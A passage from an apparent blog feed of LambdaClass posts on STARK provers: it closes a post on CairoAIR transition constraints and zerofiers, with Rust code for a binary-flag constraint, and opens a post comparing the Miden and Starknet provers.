&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                period,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                offset,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                exemptions_period,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                periodic_exemptions_offset,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                end_exemptions,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            );&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            zerofier_groups&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                .entry(zerofier_group_key)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                .or_insert_with(|| c.zerofier_evaluations_on_extended_domain(domain));&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let zerofier_evaluations = zerofier_groups.get(&amp;amp;zerofier_group_key).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            evals[c.constraint_idx()] = zerofier_evaluations.clone();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        });&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        evals&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;implementing-the-cairoair&quot;&gt;Implementing the CairoAIR&lt;&#x2F;h2&gt;
&lt;p&gt;The implementation of the CairoAIR starts &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;blob&#x2F;f271ed876cfa3aa58e36a29e22430eef3703fdc8&#x2F;provers&#x2F;cairo&#x2F;src&#x2F;air.rs#L535&quot;&gt;here&lt;&#x2F;a&gt;. We begin by defining the &lt;code&gt;fn new&lt;&#x2F;code&gt;, which contains the 64 constraints, the transition exemptions and the AIRContext. Since the Stone Prover uses virtual columns, the final number of constraints (counting transition and boundary constraints) will be 46. The main trace has six columns, and the auxiliary trace has 2. The plain layout for one step can be found in the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;blob&#x2F;main&#x2F;docs&#x2F;src&#x2F;starks&#x2F;stone_prover&#x2F;trace_plain_layout.md&quot;&gt;documentation of our prover&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;The implementation of the &lt;code&gt;TransitionConstraint&lt;&#x2F;code&gt; trait for each of the constraints is done &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;blob&#x2F;main&#x2F;provers&#x2F;cairo&#x2F;src&#x2F;transition_constraints.rs#L8&quot;&gt;here&lt;&#x2F;a&gt;. This is the list of transition constraints for the CairoAIR using the plain layout:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * BitPrefixFlag0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * BitPrefixFlag1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * BitPrefixFlag2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * BitPrefixFlag3&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * BitPrefixFlag4&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * BitPrefixFlag5&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * BitPrefixFlag6&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * BitPrefixFlag7&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * BitPrefixFlag8&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * BitPrefixFlag9&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * BitPrefixFlag10&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * BitPrefixFlag11&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * BitPrefixFlag12&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * BitPrefixFlag13&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * BitPrefixFlag14&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * ZeroFlagConstraint&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * InstructionUnpacking&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * CpuOperandsMemDstAddr&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * CpuOperandsMem0Addr&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * CpuOperandsMem1Addr&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * CpuUpdateRegistersApUpdate&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * CpuUpdateRegistersFpUpdate&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * CpuUpdateRegistersPcCondPositive&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * CpuUpdateRegistersPcCondNegative&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * CpuUpdateRegistersUpdatePcTmp0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * CpuUpdateRegistersUpdatePcTmp1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * CpuOperandsOpsMul&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * CpuOperandsRes&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * CpuOpcodesCallPushFp&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * CpuOpcodesCallPushPc&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * CpuOpcodesAssertEq&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * MemoryDiffIsBit0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * MemoryDiffIsBit1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * MemoryDiffIsBit2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * MemoryDiffIsBit3&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * MemoryDiffIsBit4&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * MemoryIsFunc0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * MemoryIsFunc1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * MemoryIsFunc2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * MemoryIsFunc3&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * MemoryIsFunc4&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * MemoryMultiColumnPermStep0_0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * MemoryMultiColumnPermStep0_1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * MemoryMultiColumnPermStep0_2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * MemoryMultiColumnPermStep0_3&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * MemoryMultiColumnPermStep0_4&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Rc16DiffIsBit0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Rc16DiffIsBit1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Rc16DiffIsBit2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Rc16DiffIsBit3&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Rc16PermStep0_0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Rc16PermStep0_1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Rc16PermStep0_2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Rc16PermStep0_3&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * FlagOp1BaseOp0BitConstraint&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * FlagResOp1BitConstraint&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * FlagPcUpdateRegularBit&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * FlagFpUpdateRegularBit&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * CpuOpcodesCallOff0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * CpuOpcodesCallOff1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * CpuOpcodesCallFlags&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * CpuOpcodesRetOff0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * CpuOpcodesRetOff2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * CpuOpcodesRetFlags&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We will take a look at the implementation of the &lt;code&gt;BitPrefixFlag0&lt;&#x2F;code&gt; constraint, which we reproduce below:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;impl TransitionConstraint&amp;lt;Stark252PrimeField, Stark252PrimeField&amp;gt; for BitPrefixFlag0 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    fn degree(&amp;amp;self) -&amp;gt; usize {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    fn constraint_idx(&amp;amp;self) -&amp;gt; usize {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    fn evaluate(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;self,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        frame: &amp;amp;stark_platinum_prover::frame::Frame&amp;lt;Stark252PrimeField, Stark252PrimeField&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        transition_evaluations: &amp;amp;mut [Felt252],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        _periodic_values: &amp;amp;[Felt252],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        _rap_challenges: &amp;amp;[Felt252],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let current_step = frame.get_evaluation_step(0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let constraint_idx = self.constraint_idx();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let current_flag = current_step.get_main_evaluation_element(0, constraint_idx);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let next_flag = current_step.get_main_evaluation_element(0, constraint_idx + 1);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let one = Felt252::one();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let two = Felt252::from(2);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let bit = current_flag - two * next_flag;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let res = bit * (bit - one);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        transition_evaluations[constraint_idx] = res;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    fn end_exemptions(&amp;amp;self) -&amp;gt; usize {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This constraint enforces that the variable corresponding to Flag0 is binary, that is, $b \in \{0, 1\}$. Mathematically, this condition is expressed as $b (1 - b) = 0$.&lt;&#x2F;p&gt;
&lt;p&gt;First, we define the degree of the constraint. Since the polynomial defining the constraint $b (1 - b) = 0$ is quadratic, the degree function will return $2$. Next, we define the constraint index or identifier, which has to be between 0 and 63. We choose 0 for this constraint (but we could change it if we want the constraints to be in another order, which is convenient if we have to rearrange the constraints for compatibility). In this case, since the variable has to be binary at every execution step, the &lt;code&gt;end_exemptions&lt;&#x2F;code&gt; is simply 0.&lt;&#x2F;p&gt;
&lt;p&gt;We can now jump to the &lt;code&gt;evaluate&lt;&#x2F;code&gt; function for the constraint. To evaluate the constraint, we need the &lt;code&gt;frame&lt;&#x2F;code&gt; (containing the elements from the LDE of the main and auxiliary traces) and &lt;code&gt;transition_evaluations&lt;&#x2F;code&gt;, which we will modify to add the value corresponding to the constraint. The call to &lt;code&gt;get_evaluation_step&lt;&#x2F;code&gt; fetches the evaluation frame for the current step, and with the constraint index, we look up the current and next flags (this is an optimization used in the Stone Prover). We then recover the bit as &lt;code&gt;current_flag - two * next_flag&lt;&#x2F;code&gt; and compute the constraint expression &lt;code&gt;bit * (bit - one)&lt;&#x2F;code&gt;, which should be zero when evaluated using the values of a valid trace. Finally, we store the value in &lt;code&gt;transition_evaluations&lt;&#x2F;code&gt; at position &lt;code&gt;constraint_idx&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
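The decomposition behind this constraint can be illustrated outside the prover. If the flag column stores the suffix values $t_i$ obtained by shifting a 15-bit flags word right by $i$ bits (so the 16th value is zero), then $t_i - 2 t_{i+1}$ recovers bit $i$, and the constraint checks that it is binary. The sketch below uses plain integers and hypothetical helper names; it does not follow the lambdaworks frame API.

```rust
// Illustration of the bit-prefix flag column: it stores t_i = flags shifted
// right by i, for i = 0..=15 (so t_15 = 0, enforced by ZeroFlagConstraint),
// and each BitPrefixFlag_i constraint checks that t_i - 2*t_{i+1} is a bit.
// Hypothetical helpers; the real frame and field types are elided.

fn prefix_column(flags: u16) -> [i64; 16] {
    let mut col = [0i64; 16];
    for i in 0..16 {
        col[i] = (flags >> i) as i64;
    }
    col
}

// The transition-constraint expression bit * (bit - 1): zero iff bit is 0 or 1.
fn bit_constraint(t_i: i64, t_next: i64) -> i64 {
    let bit = t_i - 2 * t_next;
    bit * (bit - 1)
}

fn main() {
    let flags: u16 = 0b010_1101_1001_0110; // an arbitrary 15-bit flags word
    let col = prefix_column(flags);
    assert_eq!(col[15], 0); // the 16th value is always zero
    for i in 0..15 {
        // Every BitPrefixFlag constraint evaluates to zero on a valid column.
        assert_eq!(bit_constraint(col[i], col[i + 1]), 0);
    }
    println!("all flag constraints hold");
}
```

In the real AIR the same idea runs over Stark252 field elements, and the sixteenth value is enforced by the separate ZeroFlagConstraint.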
&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
&lt;p&gt;In this post, we covered the changes introduced in STARK Platinum to handle transition constraints and AIR definitions. These changes let us experiment more easily with different layouts and spare the user from supplying explicit expressions for the zerofiers. We covered how zerofiers are defined and how constraint evaluations are carried out. We also expect the changes to help us test other features, such as using smaller fields in Starknet (though this may need further work).&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Comparing STARK provers: Miden and Starknet</title>
          <pubDate>Fri, 12 Jan 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/comparing-stark-provers/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/comparing-stark-provers/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/comparing-stark-provers/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;STARKs (scalable transparent arguments of knowledge) have gained widespread attention due to their ability to help scale Ethereum. They allow one party, the prover, to show to a verifier that a given program execution is correct by submitting proof that can be verified much faster than naïve re-execution by the verifier. The proof size is also smaller, of order $\mathcal{O} (\log^2 (n))$, where $n$ is the number of steps in the computation. Starknet and Polygon Miden use STARKs in their protocols to generate these proofs, using their customized versions. Starknet uses the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;tree&#x2F;main&#x2F;src&#x2F;starkware&quot;&gt;Stone Prover&lt;&#x2F;a&gt;, while Miden uses &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;facebook&#x2F;winterfell&#x2F;tree&#x2F;main&#x2F;prover&quot;&gt;Winterfell&lt;&#x2F;a&gt;. Our prover, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;tree&#x2F;main&#x2F;provers&#x2F;stark&quot;&gt;STARK Platinum&lt;&#x2F;a&gt; in lambdaworks, is a general prover that we want to use as a drop-in replacement for any of these provers. If you want to understand how STARKs work, you can see our previous posts on &lt;a href=&quot;&#x2F;lambdaworks-or-how-we-decided-to-created-our-zksnarks-library-and-a-stark-prover&#x2F;&quot;&gt;STARKs&lt;&#x2F;a&gt;, the &lt;a href=&quot;&#x2F;overview-of-the-stone-prover&#x2F;&quot;&gt;Stone prover&lt;&#x2F;a&gt; and &lt;a href=&quot;&#x2F;how-to-code-fri-from-scratch&#x2F;&quot;&gt;FRI&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;general-steps&quot;&gt;General steps&lt;&#x2F;h2&gt;
&lt;p&gt;In a nutshell, STARKs represent a computation using an execution trace (a large table containing the values of the registers during the computation), and an algebraic intermediate representation (AIR), which is a set of polynomial constraints that should be enforced over the trace. STARKs have been improved by leveraging a preprocessing stage and getting randomness from the verifier, turning the AIR into a randomized AIR with preprocessing. This way, we can extend the trace with additional variables that will be useful for memory checks or communicating with a coprocessor. The main steps are:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Interpolate the trace columns to get the trace polynomials.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Commit to the trace polynomials by evaluating over a larger domain (low-degree extension) and using these evaluations as leaves in a Merkle tree.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Optional: sample randomness from the verifier and extend the trace to the auxiliary trace. Interpolate the auxiliary trace columns and commit to these polynomials following the strategy in step 2.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Sample randomness from the verifier and compute the composition polynomial using the AIR constraints and the whole trace. Commit to the composition polynomial.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. Get out-of-domain point $z$ from the verifier, evaluate the trace polynomials and composition polynomial at $z$, and send them to the verifier.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    6. Build the DEEP composition polynomial, which will let us check that the evaluations of the polynomials in point 5 are correct.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    7. Apply the FRI protocol to the DEEP composition polynomial and get the proof.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;checking-constraints&quot;&gt;Checking constraints&lt;&#x2F;h2&gt;
&lt;p&gt;The way we check that the constraints are enforced is as follows: let’s denote the rows of the trace as $x_0, x_1, … x_N$. An element of the trace is simply $x_{ij}$, which is a field element. An AIR constraint is some multivariate polynomial $P(u, v, w)$ where $u$, $v$, and $w$ can be elements from different rows or columns. Each of these constraints also has a validity range. Here are some examples of constraints:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Simple boundary constraints: these enforce that a given position in the trace $x_{ij}$ has a prescribed value. For example, we want register $2$ in row $0$ to be equal to 5. The constraint polynomial will be $P (x) = x_2 - 5$. If the trace is valid, when we plug $x_0$ into $P$, we will have $x_{02} - 5 = 0$. If we use some other row, then the polynomial would not necessarily evaluate to $0$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Consistency constraints: these enforce that the values of some register satisfy a given condition. For example, if we want register $4$ to be a boolean variable, we need that $x_{k4} (1 - x_{k4} ) = 0$ for all $k$. The constraint polynomial is therefore $P (x) = x_{4} (1 - x_4 )$ and this should hold for all rows.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Simple transition constraints: these show that the value of a register in a row is compatible with the values in the previous row, as dictated by the computation. For example, if we have a sequence $x_{0, n + 1} = x_{0,n}^2 + x_{1,n}$, the constraint polynomial is $P(x_{k + 1}, x_k ) = x_{0,k + 1} - x_{0,k}^2 - x_{1,k}$. The constraint holds throughout the computation, except in the last row.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
